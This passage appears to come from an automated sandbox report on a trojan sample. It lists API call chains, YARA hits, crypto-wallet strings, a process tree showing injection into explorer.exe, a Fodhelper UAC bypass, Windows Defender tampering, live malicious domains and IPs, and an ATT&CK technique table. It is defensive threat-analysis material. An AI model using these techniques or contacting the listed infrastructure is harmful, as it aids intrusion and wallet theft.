                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif	Code function: 10_2_009EE5F4 GetLocalTime,10_2_009EE5F4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif	Code function: 10_2_009EE652 GetUserNameW,10_2_009EE652
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif	Code function: 10_2_009CBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_009CBCD2
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe	Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
                        Source: C:\Windows\SysWOW64\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\SysWOW64\PING.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match	File source: 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000015.00000003.2406506000.0000025F9EEDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 0000002E.00000003.2491188637.000001E8E77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000027.00000003.2469980302.000001FEA7818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 0000002E.00000002.2582242198.000001E8E75F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000015.00000003.2406506000.0000025F9EEDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: Process Memory Space: DE5A.exe PID: 4348, type: MEMORYSTR
                        Source: Yara match	File source: Process Memory Space: DE5A.exe PID: 3468, type: MEMORYSTR
                        Source: Yara match	File source: Process Memory Space: DE5A.exe PID: 3588, type: MEMORYSTR
                        Source: Yara match	File source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.key, type: DROPPED
                        Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI35882\rarreg.key, type: DROPPED
                        Source: Yara match	File source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match	File source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match	File source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match	File source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match	File source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Source: Yara match	File source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match	File source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Source: Yara matchFile source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                        Source: wsruwiiBinary or memory string: WIN_81
                        Source: wsruwiiBinary or memory string: WIN_XP
                        Source: wsruwii, 00000014.00000002.2902897025.0000000000203000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                        Source: wsruwiiBinary or memory string: WIN_XPe
                        Source: wsruwiiBinary or memory string: WIN_VISTA
                        Source: wsruwiiBinary or memory string: WIN_7
                        Source: wsruwiiBinary or memory string: WIN_8
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 3468, type: MEMORYSTR

                        Remote Access Functionality

                        Source: C:\Users\user\AppData\Local\Temp\bound.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Source: Yara match | File source: 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000003.2406506000.0000025F9EEDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000002E.00000003.2491188637.000001E8E77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000027.00000003.2469980302.000001FEA7818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A12263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_00A12263
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A11C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 10_2_00A11C61
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 20_2_001C2263
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 20_2_001C1C61
                        MITRE ATT&CK Matrix
                        Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.
                        Techniques flagged for this sample, listed per tactic with the badge digits exactly as displayed in the matrix:

                        Reconnaissance: none flagged
                        Resource Development: none flagged
                        Initial Access: 2 Valid Accounts
                        Execution: 31 Windows Management Instrumentation; 2 Native API; 1 Exploitation for Client Execution; 112 Command and Scripting Interpreter
                        Persistence: 1 DLL Side-Loading; 2 Valid Accounts; 11 Registry Run Keys / Startup Folder
                        Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 512 Process Injection; 11 Registry Run Keys / Startup Folder
                        Defense Evasion: 31 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 21 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 111 Masquerading; 2 Valid Accounts; 1 Modify Registry; 341 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 512 Process Injection; 1 Hidden Files and Directories
                        Credential Access: 21 Input Capture
                        Discovery: 2 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery; 48 System Information Discovery; 1 Query Registry; 551 Security Software Discovery; 341 Virtualization/Sandbox Evasion; 4 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
                        Lateral Movement: none flagged
                        Collection: 11 Archive Collected Data; 11 Data from Local System; 21 Input Capture; 3 Clipboard Data
                        Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 4 Non-Application Layer Protocol; 15 Application Layer Protocol
                        Exfiltration: none flagged
                        Impact: 1 System Shutdown/Reboot

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        Behavior Graph ID: 1438370, Sample: Og1SeeXcB2.exe, Startdate: 08/05/2024, Architecture: WINDOWS, Score: 100
                        Graph node ids are given in brackets; the bare numbers after a process name are the badges the legend describes (created registry values / created files). Indentation shows which process started (or was injected by) which.

                        Start [2]: uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENV; makemoneyminds.com; 7 other IPs or domains
                          signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures
                          Og1SeeXcB2.exe [15] (56) started
                            dropped: C:\Users\user\AppData\Local\...\Phenomenon, DOS
                            cmd.exe [20] (2) started
                              dropped: C:\Users\user\AppData\Local\...nd.pif, PE32
                              signatures: Uses ping.exe to sleep; Drops PE files with a suspicious file extension; Uses ping.exe to check the status of other devices and networks
                              End.pif [24] (12) started
                                network: 2no.co 104.21.79.229, 443, 49731 CLOUDFLARENETUS United States
                                signatures: Found API chain indicative of debugger detection; Found API chain indicative of sandbox detection; Injects a PE file into a foreign processes
                                End.pif [34] started
                                  signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
                                  explorer.exe [43] (19 8) injected
                                    network: cellc.org 179.159.229.64, 49739, 49740, 49741 CLAROSABR Brazil; makemoneyminds.com 65.108.69.93, 443, 49743 ALABANZA-BALTUS United States
                                    dropped: C:\Users\user\AppData\Roaming\wsruwii, PE32; C:\Users\user\AppData\Local\Temp\DE5A.exe, PE32+
                                    signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Hides that the sample has been downloaded from the Internet (zone.identifier)
                                    DE5A.exe [48] started
                                      dropped: C:\Users\user\AppData\Local\...\rarreg.key, ASCII; C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+; 55 other files (none is malicious)
                                      signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Removes signatures from Windows Defender; Found pyInstaller with non standard icon
                                      DE5A.exe [52] started
                                        signatures: Found many strings related to Crypto-Wallets (likely being stolen)
                                        cmd.exe [55] started
                                          ComputerDefaults.exe [64] started
                                            DE5A.exe [83] started
                                              dropped: C:\Users\user\AppData\Local\...\rarreg.key, ASCII; C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+; 55 other files (none is malicious)
                                          3 other processes [79] started
                                        cmd.exe [57] started
                                          signatures: Uses cmd line tools excessively to alter registry or file data; Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Removes signatures from Windows Defender
                                          reg.exe [66] started
                                            signatures: UAC bypass detected (Fodhelper)
                                          conhost.exe [69] started
                                        cmd.exe [60] started
                                          reg.exe [71] started
                                          conhost.exe [73] started
                                        3 other processes [62] started
                                          conhost.exe [75] started
                                          wevtutil.exe [77] started
                                          4 other processes [81] started
                                End.pif [37] started
                                End.pif [39] started
                              PING.EXE [28] (1) started
                                network: 127.0.0.1 unknown unknown
                                conhost.exe [41] started
                              cmd.exe [30] (2) started
                              7 other processes [32] started
                          wsruwii [18] (20 10) started

                        Source | Detection | Scanner | Label | Link
                        Og1SeeXcB2.exe | 18% | ReversingLabs | Win32.Trojan.Nekark |
                        Og1SeeXcB2.exe | 100% | Joe Sandbox ML | |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\VCRUNTIME140.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_bz2.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_ctypes.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_decimal.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_hashlib.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_lzma.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_queue.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_socket.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_sqlite3.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\_ssl.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs | | |
